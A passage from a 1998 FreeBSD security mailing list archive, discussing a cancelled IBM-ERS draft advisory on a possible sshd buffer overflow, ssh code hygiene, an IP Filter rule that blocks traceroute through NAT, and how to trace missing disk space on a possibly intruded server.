authentication through ssh, how could this be considered an exploint without knowing the ENTIRE configuration?! Surely if the configuration was poorly thought out, anyone with the password could gain access. >Sorry if this is a little terse - but I don't see how having a >mailbox full of "Did you hear this? and this... and this..." type >messages is going to help our situation. Let's fix it or shutup. I'd say more facts are needed: Rhosts/RhostsRSA? "PasswordAuthenications yes" or not? "PermitRootLogin" yes or not? If only RSA key, were there only certain hosts that could use the key? Or were they using wrapper to limit where connections could come from? Or were there firewall rules to limit connections to ssh? Or what combinations of any? etc, etc, etc There are just too many possibilities and since rootshell has NOT released any of this, we can only speculate. Sure there are many ways "to shoot oneself in the foot," but there are services that some use that need a bit of work in other areas to protect them. NFS would be a good one, since it was mentioned in this thread. Using NIS would be another one, but many services depend on "sane" implementations. Also you can't fix something if you don't know how to break it or this case, how it was broken. Even so, I can appreciate someone doing an audit of sshd's code and pointing out *potential* problems and possibly providing a "fix" to the FBSD port version. Not one mentions IBM's suggestions and if they should be used. Would using some of the code from ssh2 be an improvement, since ssh2 was an almost complete rewrite. Vaguely amused by the article at ssh.fi and moderately concerned that a system, paraphrasing them, "using only ssh for connection" was compromized. Continued discussion should about how one should configure sshd properly, especially if it will be the only access method allowed. I'm concerned, but don't care to run around and cry "the sky is falling" without knowing WHY it is falling, if indeed it is. regards Jeff Mountin - Unix Systems TCP/IP networking jeff@mountin.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 13:23:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA07058 for freebsd-security-outgoing; Mon, 2 Nov 1998 13:23:04 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rgate2.ricochet.net (rgate2.ricochet.net [204.179.143.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA07043 for ; Mon, 2 Nov 1998 13:22:58 -0800 (PST) (envelope-from enkhyl@scient.com) Received: from mg137-090.ricochet.net (mg137-090.ricochet.net [204.179.137.90]) by rgate2.ricochet.net (8.8.8/8.8.8) with ESMTP id PAA24108; Mon, 2 Nov 1998 15:22:35 -0600 (CST) Date: Mon, 2 Nov 1998 13:21:49 -0800 (PST) From: Christopher Nielsen X-Sender: enkhyl@ender.sf.scient.com Reply-To: enkhyl@hayseed.net To: Peter Jeremy cc: freebsd-security@FreeBSD.ORG, winter@jurai.net Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: <98Nov2.132551est.40330@border.alcanet.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Nov 1998, Peter Jeremy wrote: > Date: Mon, 2 Nov 1998 13:26:18 +1100 > From: Peter Jeremy > To: freebsd-security@FreeBSD.ORG, winter@jurai.net > Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) > > "Matthew N. Dodd" wrote: > > At this point there isn't any reason not to go about fixing these > >potential problems though. > > ssh also contains a large number of sprintf() calls. Not all of these > are immediately innocuous. There are also 2 sscanf() calls with %s > formats which could be dangerous. Not to mention the str[n]cat() and > str[n]cpy() calls. Unfortunately I have another bushfire to worry > about right now, or I'd check through them as well. > > The problem with C is that there are too many ways to shoot yourself > in the foot... A full security audit on ssh (which it sounds like it > might need) would be fairly time-consuming. It might be time better spent rewriting SSH. SSH 1.2.x is suffering from serious bloat, IMHO. Yes, I know about version 2.x; I'm just not particularly happy with the license. -- Christopher Nielsen Scient: The Art and Science of Electronic Business cnielsen@scient.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 14:22:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA16669 for freebsd-security-outgoing; Mon, 2 Nov 1998 14:22:07 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from bow.net (bow.net [204.216.183.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA16662 for ; Mon, 2 Nov 1998 14:22:06 -0800 (PST) (envelope-from bow@bow.net) Received: (from bow@localhost) by bow.net (8.9.1/8.9.1) id OAA09923 for freebsd-security@freebsd.org; Mon, 2 Nov 1998 14:20:50 -0800 (PST) From: bow Message-Id: <199811022220.OAA09923@bow.net> Subject: Important information about IBM-ERS' "ssh" advisory (fwd) To: freebsd-security@FreeBSD.ORG Date: Mon, 2 Nov 1998 14:20:50 -0800 (PST) X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Forwarded message from David A. Curry ----- >From errors-nohumans@merit.edu Mon Nov 2 12:08:55 1998 Message-Id: <199811020916.EAA05454@intrepid.somers.hqregion.ibm.com> To: nanog@merit.edu Subject: Important information about IBM-ERS' "ssh" advisory Content-ID: <5447.909998182.1@intrepid.somers.hqregion.ibm.com> Date: Mon, 02 Nov 1998 04:16:22 EST From: "David A. Curry" Sender: owner-nanog@merit.edu On Friday, Oct. 30th, IBM-ERS sent out a draft advisory to be released on Monday, Nov. 2nd that described a buffer overflow condition in Version 1.2.x "sshd." This draft was sent to the Forum of Incident Response and Security Teams, and also to the "ssh-bugs" list for their comment/review. The draft was identified as ERS-SVA-E01-1998:005.1. Rootshell has unfortunately chosen to include a copy of this draft advisory in their recent newsletter, apparently for the purposes of defending itself against charges that it was unfairly disparaging "sshd." Use of IBM-ERS's draft advisory in this manner was not approved or authorized by IBM-ERS, and does a disservice to all. Here are the facts about this advisory: 1. IBM-ERS advisory ERS-SVA-E01-1998:005.1 was never issued publicly by IBM. 2. In response to a telephone query from Kit Knox of Rootshell, IBM-ERS attempted to contact Kit on Friday evening, and was unable to reach him. Specific contact information for IBM-ERS, as well as a brief status update, were left on Mr. Knox's voice mail. Mr. Knox never contacted IBM-ERS after that time. 3. IBM has been working closely with Tatu Ylonen, author of "ssh," to make sure that the potential vulnerability described in the advisory is not exploitable. Upon further investigation, the problem originally described appears to have been influenced by outside factors and does not appear to be an exploitable problem in "sshd." 4. IBM-ERS advisory ERS-SVA-E01-1998:005.1 was CANCELLED on the morning of Sunday, Nov. 1st, *before* Mr. Knox issued his newsletter. 5. At this time, IBM-ERS has NO KNOWLEDGE of any security vulnerabilities, exploitable or otherwise, in the "sshd" program. We hope that this clarifies IBM's involvement in this situation. --------------------------------------------------------------------------- The information in this document is provided as a service to customers of the IBM Emergency Response Service. Neither International Business Machines Corporation, nor any of its employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, complete- ness, or usefulness of any information, apparatus, product, or process contained herein, or represents that its use would not infringe any privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by IBM or its subsidiaries. The views and opinions of authors expressed herein do not necessarily state or reflect those of IBM or its subsidiaries, and may not be used for advertising or product endorsement purposes. ----- End of forwarded message from David A. Curry ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 14:38:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA19186 for freebsd-security-outgoing; Mon, 2 Nov 1998 14:38:10 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id OAA19178 for ; Mon, 2 Nov 1998 14:38:07 -0800 (PST) (envelope-from imp@village.org) Received: from harmony [10.0.0.6] by rover.village.org with esmtp (Exim 1.71 #1) id 0zaSbg-0002YZ-00; Mon, 2 Nov 1998 15:37:52 -0700 Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.1/8.8.3) with ESMTP id PAA16222; Mon, 2 Nov 1998 15:37:33 -0700 (MST) Message-Id: <199811022237.PAA16222@harmony.village.org> To: bow Subject: Re: [rootshell] Security Bulletin #25 (fwd) Cc: FreeBSD-security@FreeBSD.ORG In-reply-to: Your message of "Sun, 01 Nov 1998 14:54:57 PST." <199811012254.OAA29528@bow.net> References: <199811012254.OAA29528@bow.net> Date: Mon, 02 Nov 1998 15:37:33 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Just so everyone knows, this advisory was only a draft advisory and was cancelled over the weekend. I saw the original advisory and checked stuff in based on it, since generally changes like this are good and can't hurt anything. After I checked in the fixes to ssh, I discovered that it had been determined that there was no way of exploiting this buffer call because all the places that called it had bounds checking. Given that the changes I made don't hurt anything, I'm going to leave them in for now. Warner -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBNj40Kdxynu/2qPVhAQFHRQP9FE//4+CBcUQcZAyKZCMsPNPXu2aiihlx NnoD3vkxtCtkopxaTIVeadtcqMdKpVuhLSK2ChrCnZNtpHu4lE/ZImiUQj5WXyyr klHlR+rY8tNHQFf9xtlVNcqULYx/wkJCLJSCknlzUA+/xblhUlR2n64ctvodRI40 ESNEjlOFBwA= =aOA4 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 15:00:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA21953 for freebsd-security-outgoing; Mon, 2 Nov 1998 15:00:41 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cyclops.xtra.co.nz (cyclops.xtra.co.nz [202.27.184.96]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA21946 for ; Mon, 2 Nov 1998 15:00:38 -0800 (PST) (envelope-from junkmale@pop3.xtra.co.nz) Received: from wocker (210-55-210-87.ipnets.xtra.co.nz [210.55.210.87]) by cyclops.xtra.co.nz (8.9.1/8.9.1) with SMTP id MAA19467; Tue, 3 Nov 1998 12:00:24 +1300 (NZDT) Message-Id: <199811022300.MAA19467@cyclops.xtra.co.nz> From: "Dan Langille" Organization: DVL Software Limited To: Darren Reed Date: Tue, 3 Nov 1998 12:00:24 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: IPFW problems... Reply-to: junkmale@xtra.co.nz CC: freebsd-security@FreeBSD.ORG In-reply-to: <199811011102.AAA03077@predator.xtra.co.nz> References: <199810291803.HAA15509@witch.xtra.co.nz> from "Dan Langille" at Oct 30, 98 07:03:17 am X-mailer: Pegasus Mail for Win32 (v3.01b) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 1 Nov 98, at 22:02, Darren Reed wrote: > In some mail from Dan Langille, sie said: > > > > On 29 Oct 98, at 21:45, Darren Reed wrote: > > > > > traceroute/UDP was fixed on the weekend last, the pc (ICMP) version > > > may not yet work. > > > > OK. Good! Can you guess when the other version will work? > > My testing shows "traceroute -I" to work properly with NAT. I'm not sure what "traceroute -I" does. I see no such option on traceroute for FreeBSD 2.2.7. As for my traceroute problems, my mind is unclear. I admit that I didn't take full notes. As such, I supply the following in the hopes that it may trigger something when you read it. If it does not, then I will reinstall IP Filter and get the full story. I'm using IP Filter 3.2.9 under FreeBSD 2.2.7 RELEASE. I believe I was able to traceroute when using NAT and without any deny rules. When I tried to add in the example firewall rules (from rules/BASIC_2.FW), I found that disabling the following rule allowed traceroute to work: block in log quick all with short When this rule was present, traceroute did not work at all. -- Dan Langille The FreeBSD Diary http://www.FreeBSDDiary.com/freebsd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 15:49:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA27830 for freebsd-security-outgoing; Mon, 2 Nov 1998 15:49:45 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (aniwa.actrix.gen.nz [203.96.56.186]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA27817 for ; Mon, 2 Nov 1998 15:49:36 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.8/8.8.7) with SMTP id MAA09378; Tue, 3 Nov 1998 12:47:41 +1300 (NZDT) (envelope-from andrew@squiz.co.nz) Date: Tue, 3 Nov 1998 12:47:41 +1300 (NZDT) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Warner Losh cc: bow , FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) In-Reply-To: <199811022237.PAA16222@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Nov 1998, Warner Losh wrote: > Just so everyone knows, this advisory was only a draft advisory and > was cancelled over the weekend. I saw the original advisory and > checked stuff in based on it, since generally changes like this are > good and can't hurt anything. After I checked in the fixes to ssh, I > discovered that it had been determined that there was no way of > exploiting this buffer call because all the places that called it had > bounds checking. I had a brief look over the ssh code some months ago. I didn't find anything exploitable, but I did find things that made me uncomfortable, like the logging routine that uses vsprintf (or something similarly lacking in bounds checking) and expected all the places it was checked to do the bounds checking. As far as I looked, they pretty much did, though in one place I noted that it was dependent on the length of a domain name returned from a reverse lookup. Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 17:02:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA10206 for freebsd-security-outgoing; Mon, 2 Nov 1998 17:02:06 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA10201 for ; Mon, 2 Nov 1998 17:02:04 -0800 (PST) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id SAA00776; Mon, 2 Nov 1998 18:01:30 -0700 (MST) Message-Id: <4.1.19981102180015.046c7490@127.0.0.1> X-Sender: brett@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Mon, 02 Nov 1998 18:01:23 -0700 To: andrew@squiz.co.nz, Warner Losh From: Brett Glass Subject: Re: [rootshell] Security Bulletin #25 (fwd) Cc: bow , FreeBSD-security@FreeBSD.ORG In-Reply-To: References: <199811022237.PAA16222@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:47 PM 11/3/98 +1300, Andrew McNaughton wrote: >I had a brief look over the ssh code some months ago. I didn't find >anything exploitable, but I did find things that made me uncomfortable, >like the logging routine that uses vsprintf (or something similarly >lacking in bounds checking) and expected all the places it was checked to >do the bounds checking. Watch out for logging routines. When some folks got into our system via the Qpopper exploit, the long messages sent by QPopper crashed syslogd. This might be an avenue for a hack. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 20:11:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA04498 for freebsd-security-outgoing; Mon, 2 Nov 1998 20:11:41 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from emu.sourcee.com (emu.sourcee.com [199.201.159.173]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA04488 for ; Mon, 2 Nov 1998 20:11:38 -0800 (PST) (envelope-from nrice@emu.sourcee.com) Received: (from nrice@localhost) by emu.sourcee.com (8.9.1/8.9.1) id XAA03032; Mon, 2 Nov 1998 23:11:00 -0500 (EST) Message-ID: <19981102231100.C2779@emu.sourcee.com> Date: Mon, 2 Nov 1998 23:11:00 -0500 From: "Norman C. Rice" To: junkmale@xtra.co.nz, Darren Reed Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPFW problems... References: <199810291803.HAA15509@witch.xtra.co.nz> <199811011102.AAA03077@predator.xtra.co.nz> <199811022300.MAA19467@cyclops.xtra.co.nz> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91.1i In-Reply-To: <199811022300.MAA19467@cyclops.xtra.co.nz>; from Dan Langille on Tue, Nov 03, 1998 at 12:00:24PM +1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Nov 03, 1998 at 12:00:24PM +1300, Dan Langille wrote: > On 1 Nov 98, at 22:02, Darren Reed wrote: > > > In some mail from Dan Langille, sie said: > > > > > > On 29 Oct 98, at 21:45, Darren Reed wrote: > > > > > > > traceroute/UDP was fixed on the weekend last, the pc (ICMP) version > > > > may not yet work. > > > > > > OK. Good! Can you guess when the other version will work? > > > > My testing shows "traceroute -I" to work properly with NAT. > > I'm not sure what "traceroute -I" does. I see no such option on > traceroute for FreeBSD 2.2.7. Perhaps he is using the Linux version of traceroute where the `-I' option uses ICMP ECHO instead of UDP datagrams. -- Regards, Norman C. Rice, Jr. > > As for my traceroute problems, my mind is unclear. I admit that I didn't > take full notes. As such, I supply the following in the hopes that it may > trigger something when you read it. If it does not, then I will reinstall > IP Filter and get the full story. > > I'm using IP Filter 3.2.9 under FreeBSD 2.2.7 RELEASE. > > I believe I was able to traceroute when using NAT and without any deny > rules. When I tried to add in the example firewall rules (from > rules/BASIC_2.FW), I found that disabling the following rule allowed > traceroute to work: > > block in log quick all with short > > When this rule was present, traceroute did not work at all. > > -- > Dan Langille > The FreeBSD Diary > http://www.FreeBSDDiary.com/freebsd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 20:44:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA09027 for freebsd-security-outgoing; Mon, 2 Nov 1998 20:44:34 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.224.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA09017 for ; Mon, 2 Nov 1998 20:44:32 -0800 (PST) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199811030444.UAA09017@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA237158227; Tue, 3 Nov 1998 15:43:47 +1100 From: Darren Reed Subject: Re: IPFW problems... To: nrice@emu.sourcee.com (Norman C. Rice) Date: Tue, 3 Nov 1998 15:43:47 +1100 (EDT) Cc: junkmale@xtra.co.nz, avalon@coombs.anu.edu.au, freebsd-security@FreeBSD.ORG In-Reply-To: <19981102231100.C2779@emu.sourcee.com> from "Norman C. Rice" at Nov 2, 98 11:11:00 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Norman C. Rice, sie said: > > On Tue, Nov 03, 1998 at 12:00:24PM +1300, Dan Langille wrote: > > On 1 Nov 98, at 22:02, Darren Reed wrote: > > > > > In some mail from Dan Langille, sie said: > > > > > > > > On 29 Oct 98, at 21:45, Darren Reed wrote: > > > > > > > > > traceroute/UDP was fixed on the weekend last, the pc (ICMP) version > > > > > may not yet work. > > > > > > > > OK. Good! Can you guess when the other version will work? > > > > > > My testing shows "traceroute -I" to work properly with NAT. > > > > I'm not sure what "traceroute -I" does. I see no such option on > > traceroute for FreeBSD 2.2.7. > > Perhaps he is using the Linux version of traceroute where the > `-I' option uses ICMP ECHO instead of UDP datagrams. Not the "Linux" version, at least traceroute 1.4a5 (from LBL) supports it. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 20:57:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA10650 for freebsd-security-outgoing; Mon, 2 Nov 1998 20:57:06 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tok.qiv.com (tok.qiv.com [205.238.142.68]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA10645 for ; Mon, 2 Nov 1998 20:57:05 -0800 (PST) (envelope-from jdn@acp.qiv.com) Received: (from uucp@localhost) by tok.qiv.com (8.8.8/8.8.5) with UUCP id WAA07863 for security@freebsd.org; Mon, 2 Nov 1998 22:56:58 -0600 (CST) Received: from localhost (jdn@localhost) by acp.qiv.com (8.8.8/8.8.8) with SMTP id WAA02152 for ; Mon, 2 Nov 1998 22:56:25 -0600 (CST) (envelope-from jdn@acp.qiv.com) Date: Mon, 2 Nov 1998 22:56:24 -0600 (CST) From: Jay Nelson To: security@FreeBSD.ORG Subject: hidden files question Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org We have an office server running 2.2.7-RELEASE doing DNS, Samba and mail. We have had several intrusion atempts over the past few weeks that have failed. Today, /var was showing 50 MB and I could only account for about 5MB. I could find no hidden files. Any combination I've used with find hasn't shown anything. Any ideas on how I can find the missing 45MB? Is there a known benign condition that could account for this? Thanks -- Jay To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 21:33:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA14944 for freebsd-security-outgoing; Mon, 2 Nov 1998 21:33:23 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA14936 for ; Mon, 2 Nov 1998 21:33:20 -0800 (PST) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id WAA02966; Mon, 2 Nov 1998 22:33:11 -0700 (MST) Message-Id: <4.1.19981102223232.0470a100@127.0.0.1> X-Sender: brett@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Mon, 02 Nov 1998 22:33:07 -0700 To: Jay Nelson , security@FreeBSD.ORG From: Brett Glass Subject: Re: hidden files question In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Look in logs that have turned over. You may see lots of messages related to intrusion attempts. We did. --Brett At 10:56 PM 11/2/98 -0600, Jay Nelson wrote: >We have an office server running 2.2.7-RELEASE doing DNS, Samba and >mail. We have had several intrusion atempts over the past few weeks >that have failed. Today, /var was showing 50 MB and I could only >account for about 5MB. I could find no hidden files. > >Any combination I've used with find hasn't shown anything. Any ideas >on how I can find the missing 45MB? > >Is there a known benign condition that could account for this? > >Thanks > >-- Jay > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 21:55:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA17381 for freebsd-security-outgoing; Mon, 2 Nov 1998 21:55:31 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from noether.uoregon.edu (noether.uoregon.edu [128.223.36.95]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA17376 for ; Mon, 2 Nov 1998 21:55:29 -0800 (PST) (envelope-from jl@noether.uoregon.edu) Received: from localhost (jl@localhost) by noether.uoregon.edu (8.8.7/8.8.7) with SMTP id VAA01049; Mon, 2 Nov 1998 21:55:17 -0800 Date: Mon, 2 Nov 1998 21:55:17 -0800 (PST) From: Joshua Lackey Reply-To: Joshua Lackey To: Jay Nelson cc: security@FreeBSD.ORG Subject: Re: hidden files question In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Possible you had ``ls'' replaced with a version that hides files. You may try ``find /var -name "*" -print'' as I've found that script-jockies will replace ``ls'' but forget other similar programs. Best thing to do is to get a known good copy of ``ls'' and look at the directory. You may also want to reboot and then go into single-user mode to make sure no lkm's are hiding things from you. Samba has had some problems in the past (if I remember correctly.) It's painful, but you're going to have to reinstall. Look into tripwire so you don't have to do it again. Josh. On Mon, 2 Nov 1998, Jay Nelson wrote: > We have an office server running 2.2.7-RELEASE doing DNS, Samba and > mail. We have had several intrusion atempts over the past few weeks > that have failed. Today, /var was showing 50 MB and I could only > account for about 5MB. I could find no hidden files. > > Any combination I've used with find hasn't shown anything. Any ideas > on how I can find the missing 45MB? > > Is there a known benign condition that could account for this? > > Thanks > > -- Jay > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- jl@noether.uoregon.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 22:03:55 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA18773 for freebsd-security-outgoing; Mon, 2 Nov 1998 22:03:55 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.224.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA18736 for ; Mon, 2 Nov 1998 22:03:51 -0800 (PST) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199811030603.WAA18736@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA250533011; Tue, 3 Nov 1998 17:03:31 +1100 From: Darren Reed Subject: Re: hidden files question To: jdn@acp.qiv.com (Jay Nelson) Date: Tue, 3 Nov 1998 17:03:31 +1100 (EDT) Cc: security@FreeBSD.ORG In-Reply-To: from "Jay Nelson" at Nov 2, 98 10:56:24 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Jay Nelson, sie said: > > We have an office server running 2.2.7-RELEASE doing DNS, Samba and > mail. We have had several intrusion atempts over the past few weeks > that have failed. Today, /var was showing 50 MB and I could only > account for about 5MB. I could find no hidden files. > > Any combination I've used with find hasn't shown anything. Any ideas > on how I can find the missing 45MB? > > Is there a known benign condition that could account for this? Files still open which have been removed. This is often the case with log files. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 22:19:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA20957 for freebsd-security-outgoing; Mon, 2 Nov 1998 22:19:20 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA20951 for ; Mon, 2 Nov 1998 22:19:18 -0800 (PST) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id WAA08967; Mon, 2 Nov 1998 22:19:10 -0800 (PST) Received: from bubba.whistle.com(207.76.205.7) by whistle.com via smap (V1.3) id sma008965; Mon Nov 2 22:19:00 1998 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id WAA03913; Mon, 2 Nov 1998 22:19:00 -0800 (PST) From: Archie Cobbs Message-Id: <199811030619.WAA03913@bubba.whistle.com> Subject: Re: IPFW problems... In-Reply-To: <199811011102.DAA13883@hub.freebsd.org> from Darren Reed at "Nov 1, 98 10:02:10 pm" To: avalon@coombs.anu.edu.au (Darren Reed) Date: Mon, 2 Nov 1998 22:19:00 -0800 (PST) Cc: junkmale@xtra.co.nz, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Darren Reed writes: > > > traceroute/UDP was fixed on the weekend last, the pc (ICMP) version may > > > not yet work. > > > > OK. Good! Can you guess when the other version will work? > > My testing shows "traceroute -I" to work properly with NAT. Normal traceroute should work through address translation, assuming you're translating UDP packets as well as TCP. If it doesn't, then the translation engine is not properly "reverse translating" the inner packet in ICMP unreachable messages (as it should). -Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 22:22:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA21417 for freebsd-security-outgoing; Mon, 2 Nov 1998 22:22:07 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.nostrum.com (nostrum-gw.cy-net.net 